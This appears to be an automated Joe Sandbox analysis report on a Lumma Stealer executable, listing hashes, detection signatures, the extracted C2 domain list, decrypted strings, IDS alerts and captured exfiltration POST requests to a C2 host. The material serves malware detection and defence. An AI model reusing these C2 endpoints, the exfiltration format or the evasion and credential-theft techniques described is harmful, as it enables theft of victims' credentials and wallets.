Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NHEXQatKdE.exe

Overview

General Information

Sample name:NHEXQatKdE.exe
renamed because original name is a hash value
Original sample name:1af7854a5ad5a97c01e2217cdf0f7656.exe
Analysis ID:1577899
MD5:1af7854a5ad5a97c01e2217cdf0f7656
SHA1:fad9ae35e40778bbe36cff4f28a3e31a3fbc58c3
SHA256:2b843617d9fef8997fa434d68a2338dfb3da3550ceefb638f5e683a4e666693a
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NHEXQatKdE.exe (PID: 5716 cmdline: "C:\Users\user\Desktop\NHEXQatKdE.exe" MD5: 1AF7854A5AD5A97C01E2217CDF0F7656)
    • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NHEXQatKdE.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\NHEXQatKdE.exe" MD5: 1AF7854A5AD5A97C01E2217CDF0F7656)
    • NHEXQatKdE.exe (PID: 4156 cmdline: "C:\Users\user\Desktop\NHEXQatKdE.exe" MD5: 1AF7854A5AD5A97C01E2217CDF0F7656)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["aspecteirs.lat", "sustainskelet.lat", "energyaffai.lat", "sweepyribs.lat", "crosshuaht.lat", "grannyejh.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat"], "Build id": "yau6Na--7911731954"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: NHEXQatKdE.exe PID: 4156JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: NHEXQatKdE.exe PID: 4156JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: NHEXQatKdE.exe PID: 4156JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:26.557736+010020283713Unknown Traffic192.168.2.649714172.67.179.109443TCP
                2024-12-18T21:22:32.441063+010020283713Unknown Traffic192.168.2.649726172.67.179.109443TCP
                2024-12-18T21:22:36.985675+010020283713Unknown Traffic192.168.2.649739172.67.179.109443TCP
                2024-12-18T21:22:55.215987+010020283713Unknown Traffic192.168.2.649780172.67.179.109443TCP
                2024-12-18T21:22:57.690905+010020283713Unknown Traffic192.168.2.649787172.67.179.109443TCP
                2024-12-18T21:23:04.817390+010020283713Unknown Traffic192.168.2.649799172.67.179.109443TCP
                2024-12-18T21:23:10.861677+010020283713Unknown Traffic192.168.2.649811172.67.179.109443TCP
                2024-12-18T21:23:19.992096+010020283713Unknown Traffic192.168.2.649836172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:31.213368+010020546531A Network Trojan was detected192.168.2.649714172.67.179.109443TCP
                2024-12-18T21:22:35.354788+010020546531A Network Trojan was detected192.168.2.649726172.67.179.109443TCP
                2024-12-18T21:23:39.112966+010020546531A Network Trojan was detected192.168.2.649836172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:31.213368+010020498361A Network Trojan was detected192.168.2.649714172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:35.354788+010020498121A Network Trojan was detected192.168.2.649726172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:26.557736+010020583651Domain Observed Used for C2 Detected192.168.2.649714172.67.179.109443TCP
                2024-12-18T21:22:32.441063+010020583651Domain Observed Used for C2 Detected192.168.2.649726172.67.179.109443TCP
                2024-12-18T21:22:36.985675+010020583651Domain Observed Used for C2 Detected192.168.2.649739172.67.179.109443TCP
                2024-12-18T21:22:55.215987+010020583651Domain Observed Used for C2 Detected192.168.2.649780172.67.179.109443TCP
                2024-12-18T21:22:57.690905+010020583651Domain Observed Used for C2 Detected192.168.2.649787172.67.179.109443TCP
                2024-12-18T21:23:04.817390+010020583651Domain Observed Used for C2 Detected192.168.2.649799172.67.179.109443TCP
                2024-12-18T21:23:10.861677+010020583651Domain Observed Used for C2 Detected192.168.2.649811172.67.179.109443TCP
                2024-12-18T21:23:19.992096+010020583651Domain Observed Used for C2 Detected192.168.2.649836172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:25.007446+010020583641Domain Observed Used for C2 Detected192.168.2.6644641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:24.862868+010020583781Domain Observed Used for C2 Detected192.168.2.6594381.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:22:56.052386+010020480941Malware Command and Control Activity Detected192.168.2.649780172.67.179.109443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://grannyejh.lat/7Avira URL Cloud: Label: malware
                Source: https://grannyejh.lat/zAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/piNAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/4Avira URL Cloud: Label: malware
                Source: https://grannyejh.lat/vAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat:443/api/Avira URL Cloud: Label: malware
                Source: https://grannyejh.lat/EAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/NAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat:443/apiwAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/cAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/dAvira URL Cloud: Label: malware
                Source: 00000000.00000002.2179942005.0000000002772000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "sustainskelet.lat", "energyaffai.lat", "sweepyribs.lat", "crosshuaht.lat", "grannyejh.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat"], "Build id": "yau6Na--7911731954"}
                Source: NHEXQatKdE.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.1% probability
                Source: NHEXQatKdE.exeJoe Sandbox ML: detected
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--7911731954
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E123B CryptContextAddRef,CloseFigure,3_2_006E123B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00415211 CryptUnprotectData,4_2_00415211
                Source: NHEXQatKdE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49787 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49836 version: TLS 1.2
                Source: NHEXQatKdE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EB12A FindFirstFileExW,0_2_006EB12A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EB1DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006EB1DB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EB12A FindFirstFileExW,3_2_006EB12A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EB1DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_006EB1DB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh4_2_004259F0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp byte ptr [eax+ebx+09h], 00000000h4_2_00436980
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov dword ptr [ebp-10h], ebx4_2_0040A283
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov word ptr [edx], cx4_2_004183F0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov edx, ecx4_2_0043D580
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h4_2_0043D580
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ecx, eax4_2_0040CE98
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov eax, dword ptr [00442B14h]4_2_0040CE98
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h4_2_0043D7B0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A2347758h4_2_0043A030
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ecx, dword ptr [ebp-2Ch]4_2_00427E16
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh4_2_0043D8E0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04255C89h]4_2_00409080
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]4_2_00422966
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]4_2_0040C93E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0040C93E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then add eax, ecx4_2_0042D1C4
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ebx, eax4_2_004059D0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ebp, eax4_2_004059D0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov byte ptr [esi], dl4_2_0042C199
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h4_2_0042A270
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ecx, eax4_2_00415A0E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh4_2_00427223
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]4_2_00422966
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movsx eax, byte ptr [edi]4_2_0043C2EE
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh4_2_004192F0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov eax, ecx4_2_00425287
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-56522565h]4_2_004222B1
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ecx, eax4_2_0041AB1A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+18h]4_2_00439BF0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-5F965E5Fh]4_2_00417BFA
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-6FEB5746h]4_2_00417BFA
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edx, word ptr [ebp+00h]4_2_00437BA9
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]4_2_0041FC50
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h4_2_0041FC50
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp byte ptr [ebx+edx], 00000000h4_2_0041D400
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov edx, ecx4_2_00437420
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 5E874B5Fh4_2_00437420
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], BC9C9AFCh4_2_00437420
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then test eax, eax4_2_00437420
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh4_2_004214C0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edi, byte ptr [ebp+00h]4_2_004094D0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00429CD0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-56522565h]4_2_00421CAB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then jmp dword ptr [00443ECCh]4_2_00421CAB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_00407550
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_00407550
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov esi, edi4_2_0041655D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then jmp dword ptr [00443684h]4_2_0041655D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh4_2_0041655D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1B9D9E48h]4_2_0041ADE9
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov word ptr [ecx], dx4_2_0040DDFA
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh4_2_00426D93
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_00425E40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-09D3FE44h]4_2_00425E40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ebp, edi4_2_00425E40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov esi, ecx4_2_00424E40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then jmp eax4_2_00416E70
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov ecx, dword ptr [ebp-2Ch]4_2_00427E16
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-000000CFh]4_2_0040AE20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then movzx ecx, byte ptr [ebx]4_2_0040AE20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov byte ptr [esi], cl4_2_0042B6E1
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then mov byte ptr [esi], cl4_2_0042B738
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh4_2_004277A1

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:59438 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:64464 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49714 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49726 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49739 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49787 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49780 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49799 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49811 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49836 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49726 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49780 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49726 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49836 -> 172.67.179.109:443
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Joe Sandbox ViewIP Address: 172.67.179.109 172.67.179.109
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49726 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49787 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49780 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49799 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49811 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49836 -> 172.67.179.109:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4NI2IDMEIU881EWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4DEKY6HNPIRCHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15080Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3BT56OA3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19908Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MIQJLMFUP3TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1187Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PZV8R242U8OZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 548547Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: grannyejh.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
